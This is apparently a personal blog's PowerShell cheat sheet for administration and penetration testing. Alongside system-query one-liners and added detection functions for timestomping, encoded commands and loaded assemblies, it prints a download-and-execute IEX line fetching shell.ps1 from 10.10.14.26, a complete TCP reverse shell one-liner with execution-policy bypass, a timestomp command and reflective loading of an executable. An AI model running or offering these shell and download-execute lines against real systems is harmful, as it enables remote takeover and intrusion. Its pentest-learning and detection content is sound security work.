
PowerShell for Hackers
As I'm learning more PowerShell and dabbling in hacking, I will be composing a list of techniques and scripts that I find very useful for administration and pen-testing.
Basics
```powershell
ipconfig
```
Linux Like Watch Command
```powershell
while ($true) { docker ps -a; sleep 5 }
```
System Running Processes
```powershell
Get-Process
```
IP to Hostname
```powershell
# GetHostByAddress is marked obsolete in .NET; GetHostEntry is the current equivalent
[System.Net.Dns]::GetHostByAddress('192.168.0.10').HostName
[System.Net.Dns]::GetHostEntry('192.168.0.10').HostName
```
Is Server Virtual or Physical?
```powershell
# %computername% is cmd.exe syntax; in PowerShell the same value is $env:COMPUTERNAME
systeminfo /s $env:COMPUTERNAME | findstr /c:"Model:" /c:"Host Name" /c:"OS Name"
```
Lookup User Information
```powershell
# get domain information of a user
net user /domain jamie.bowman

# get groups of current user
whoami /groups
```
Change File Modified Date and Time
```powershell
(dir sample_file.txt).LastWriteTime = New-Object DateTime 1976,12,31
```
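Setting LastWriteTime this way is the classic timestomp, and it is also easy to spot. The function below is an added example (not from the original post) that scans a directory for the two giveaways a hand-set timestamp leaves: a write time older than the creation time, and a write time that lands on an exact second. The `Find-SuspiciousTimestamp` name and the throwaway demo directory are my own choices.

```powershell
# Added example: heuristic scan for timestamps that look manually altered.
function Find-SuspiciousTimestamp {
    param(
        [Parameter(Mandatory)] [string] $Path
    )
    Get-ChildItem -Path $Path -File -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $reasons = @()

            # Writes normally happen after creation. The reverse means the write
            # time was set back by hand, or the file was copied (copies get a new
            # CreationTime but keep LastWriteTime), so treat it as a lead, not proof.
            if ($_.LastWriteTime -lt $_.CreationTime) {
                $reasons += 'LastWriteTime precedes CreationTime'
            }

            # Hand-set values such as "1976,12,31" land on an exact second; real
            # writes on NTFS almost always carry a sub-second component.
            if (($_.LastWriteTime.Ticks % [TimeSpan]::TicksPerSecond) -eq 0) {
                $reasons += 'LastWriteTime has no sub-second component'
            }

            if ($reasons.Count -gt 0) {
                [pscustomobject]@{
                    FullName      = $_.FullName
                    CreationTime  = $_.CreationTime
                    LastWriteTime = $_.LastWriteTime
                    Reason        = ($reasons -join '; ')
                }
            }
        }
}

# Reproduce the one-liner above on a throwaway file, then scan the directory.
$demo = Join-Path $env:TEMP 'timestomp-demo'
New-Item -ItemType Directory -Path $demo -Force | Out-Null
'sample' | Set-Content (Join-Path $demo 'sample_file.txt')
(Get-Item (Join-Path $demo 'sample_file.txt')).LastWriteTime = New-Object DateTime 1976,12,31

Find-SuspiciousTimestamp -Path $demo | Format-Table -AutoSize
```

Both rules fire on the demo file. Expect false positives from files copied between volumes and from filesystems or archives with whole-second resolution (FAT, zip extractions), so use the output as a triage list. Note also that this .NET property only rewrites the `$STANDARD_INFORMATION` timestamps; the `$FILE_NAME` attribute in the MFT record keeps its original values, which is what forensic MFT parsers compare against.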
Find Apps Running on Port
```powershell
# find the process using port 53
Get-Process -Id (Get-NetTCPConnection -LocalPort 53).OwningProcess

# find pids listening on port 80
netstat -ano | findstr ":80"

# look up a pid from the netstat output (a plain findstr "4" would match any line containing a 4)
tasklist /FI "PID eq 4"
```
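The netstat/tasklist round trip gets tedious when you want the whole listening surface of a box. The function below is an added example (not from the original post) that joins `Get-NetTCPConnection` with `Get-Process` and the WMI process owner, so each listening port comes back with its process name, executable path and the account it runs as. `Get-ListeningPortOwner` and its `-Port` filter are my own names.

```powershell
# Added example: one table of listening TCP ports and who owns them.
# Run elevated; process paths and owners of other users' processes need it.
function Get-ListeningPortOwner {
    param([int[]] $Port)   # optional filter, e.g. -Port 53,80

    $conns = Get-NetTCPConnection -State Listen
    if ($Port) { $conns = $conns | Where-Object { $Port -contains $_.LocalPort } }

    foreach ($c in $conns) {
        $proc = Get-Process -Id $c.OwningProcess -ErrorAction SilentlyContinue

        # Win32_Process.GetOwner() returns Domain/User; ReturnValue 0 means success
        $user = $null
        $wmi = Get-CimInstance Win32_Process -Filter "ProcessId = $($c.OwningProcess)" -ErrorAction SilentlyContinue
        if ($wmi) {
            $owner = $wmi | Invoke-CimMethod -MethodName GetOwner
            if ($owner.ReturnValue -eq 0) { $user = "$($owner.Domain)\$($owner.User)" }
        }

        [pscustomobject]@{
            LocalAddress = $c.LocalAddress
            LocalPort    = $c.LocalPort
            PID          = $c.OwningProcess
            Process      = $proc.ProcessName
            Path         = $proc.Path
            User         = $user
        }
    }
}

# everything listening, sorted by port
Get-ListeningPortOwner | Sort-Object LocalPort | Format-Table -AutoSize

# just the two ports from the snippets above
Get-ListeningPortOwner -Port 53,80 | Format-Table -AutoSize
```

A listener whose `Path` is under a user profile or temp directory, or whose `User` is not the service account you expect for that port, is the line worth chasing. PID 4 (System) has no path; kernel-mode listeners such as HTTP.sys and SMB show up that way.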
Base64
```powershell
# convert to base64
[Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes('whoami'))
# d2hvYW1p

# convert from base64
[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('d2hvYW1p'))

# decode a base64 string inside a powershell.exe -command call
# (this only decodes and prints 'whoami'; note that -EncodedCommand expects UTF-16LE, not UTF-8)
powershell.exe -command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('d2hvYW1p'))"
```
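When you meet base64 in a process-creation log rather than in your own shell, the encoding matters: `powershell.exe -EncodedCommand` takes UTF-16LE, so a UTF-8 string like `d2hvYW1p` does not decode to anything sensible there. The function below is an added example (not from the original post) for triage: it pulls the `-e`/`-enc`/`-EncodedCommand` argument out of a logged command line, checks the byte pattern to tell UTF-16LE from UTF-8, and returns the decoded text without running it. The function name and the two sample command lines are constructed.

```powershell
# Added example: decode an -EncodedCommand argument from a logged command line.
function ConvertFrom-EncodedCommandLine {
    param([Parameter(Mandatory)] [string] $CommandLine)

    # Match -e, -ec, -enc or -encodedcommand followed by a base64 token.
    # (powershell.exe accepts any unambiguous prefix; extend the pattern if needed.)
    $m = [regex]::Match($CommandLine, '(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)')
    if (-not $m.Success) { return $null }
    $b64 = $m.Groups[1].Value

    try   { $bytes = [Convert]::FromBase64String($b64) }
    catch { return [pscustomobject]@{ Base64 = $b64; Encoding = 'invalid base64'; Decoded = $null } }

    # ASCII text stored as UTF-16LE has 0x00 in every odd byte position.
    $oddZeros = 0
    for ($i = 1; $i -lt $bytes.Length; $i += 2) { if ($bytes[$i] -eq 0) { $oddZeros++ } }
    $looksUtf16 = ($bytes.Length -ge 2) -and ($oddZeros -eq [math]::Floor($bytes.Length / 2))

    if ($looksUtf16) {
        $encoding = 'UTF-16LE (what -EncodedCommand expects)'
        $decoded  = [Text.Encoding]::Unicode.GetString($bytes)
    } else {
        $encoding = 'not UTF-16LE; shown as UTF-8 (would not run via -EncodedCommand)'
        $decoded  = [Text.Encoding]::UTF8.GetString($bytes)
    }

    [pscustomobject]@{ Base64 = $b64; Encoding = $encoding; Decoded = $decoded }
}

# Constructed sample command lines, as they might appear in a process-creation event.
# 'dwBoAG8AYQBtAGkA' is 'whoami' in UTF-16LE; 'd2hvYW1p' is the UTF-8 value from above.
ConvertFrom-EncodedCommandLine -CommandLine 'powershell.exe -NoProfile -EncodedCommand dwBoAG8AYQBtAGkA'
ConvertFrom-EncodedCommandLine -CommandLine 'powershell.exe -enc d2hvYW1p'
```

The first call reports UTF-16LE and decodes to `whoami`; the second reports that the token is not UTF-16LE and shows `whoami` only because it was decoded as UTF-8. Feed it the `CommandLine` field from Security event 4688 or Sysmon event 1; with Script Block Logging on, event 4104 already carries the decoded script.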
Querying Databases
https://gist.github.com/cmatskas/08411b916ab01e3f1439#file-powershellsqlquery-ps1
Domain Controllers
```powershell
# requires the ActiveDirectory module (RSAT)
# get current domain name
$domainname = (Get-ADDomain).DNSRoot

# get all dcs
$dcs = Get-ADDomainController -Filter * -Server $domainname |
    Select-Object Hostname, Ipv4address, IsGlobalCatalog, Site, Forest, OperatingSystem
```
Downloading Files with PowerShell
```powershell
# powershell one-liner using System.Net.WebClient
(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.26/shell.ps1', 'shell.ps1')

# powershell one-liner using Invoke-WebRequest
Invoke-WebRequest -Uri 'http://10.10.14.26/shell.ps1' -OutFile 'shell.ps1'

# download and invoke execution
IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.26/shell.ps1')
```
PowerShell Reverse Shells
```powershell
powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```
Kubernetes
```shell
kubectl get secret/nameofsecret -o json | jq '.data | map_values(@base64d)'
```
Loading Executables in PowerShell
```powershell
[Reflection.Assembly]::LoadFile("C:\Users\mrjamiebowman\Desktop\defnotmal.exe")
[DefNotMal.Program]::Main()
```
If you screw up and need to unload the assembly, close PowerShell. An assembly loaded like this goes into the AppDomain and stays there for the lifetime of the PowerShell process; there is no way to unload it from the session.
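You can see that for yourself by listing what the current AppDomain holds. The function below is an added example (not from the original post): it enumerates the loaded assemblies and keeps only those whose file lives outside the .NET runtime, the GAC and `$PSHOME`, which is where a `LoadFile` from a user directory shows up. The function name and the directory list it treats as "framework" are my own choices.

```powershell
# Added example: which assemblies did this session load from outside the framework?
function Get-ForeignLoadedAssembly {
    $frameworkRoots = @(
        [Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory(),  # e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\
        "$env:windir\Microsoft.NET",
        "$env:windir\assembly",        # GAC on Windows PowerShell
        $PSHOME                        # PowerShell 7 keeps its runtime here
    )

    [AppDomain]::CurrentDomain.GetAssemblies() |
        Where-Object { -not $_.IsDynamic } |   # dynamic assemblies have no Location and throw on access
        ForEach-Object {
            $loc = $_.Location
            if (-not $loc) { return }

            $inFramework = $false
            foreach ($root in $frameworkRoots) {
                if ($loc.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) { $inFramework = $true; break }
            }

            if (-not $inFramework) {
                [pscustomobject]@{
                    Name     = $_.GetName().Name
                    Version  = $_.GetName().Version
                    Location = $loc
                }
            }
        }
}

Get-ForeignLoadedAssembly | Format-Table -AutoSize
```

Run it before and after the `LoadFile` call above and the new entry stays in the list until the process exits. Module assemblies from `Program Files\WindowsPowerShell\Modules` also appear, which is expected; anything under a user profile or temp path is what a reviewer cares about. Module Logging and Script Block Logging record the `LoadFile` call itself.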
Windows Exploit Suggester
While this is a Python script, you will need to gather the system info using PowerShell/CMD.
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
```powershell
systeminfo
```
Copy and paste the results into a file; commands can then easily be run against Windows Exploit Suggester, which helps with privilege escalation.
PowerShell Frameworks & Tools
These are proven frameworks that can be used to reliably exploit a Windows environment.
- Mimikatz (not PowerShell but runs alongside…)
- Nishang
- Empire Framework
- PoshC2
- PowerUpSQL
- PowerSploit
- p0wnedShell
- Prowl
- PSAttack
- Pupy
- SharpSocks (C# but deployed by PowerShell)
Using Vim with PowerShell
First, you’ll need to install Vim. Download, run and install the file “gvim82.exe” (as of 02/06/2020)…
https://www.vim.org/download.php#pc
Once Vim is installed you’ll need to run PowerShell in Administrator mode to configure the integration.
```powershell
# install
Install-Package -Name PSReadline -Force -SkipPublisherCheck

# create aliases
New-Alias -Name vi -Value 'C:\Program Files (x86)\vim\vim82\vim.exe'
New-Alias -Name vim -Value 'C:\Program Files (x86)\vim\vim82\vim.exe'

# vim edit mode
Set-PSReadlineOption -EditMode vi -BellStyle None
```
You can learn more from this article.
https://codeandkeep.com/PowerShell-And-Vim/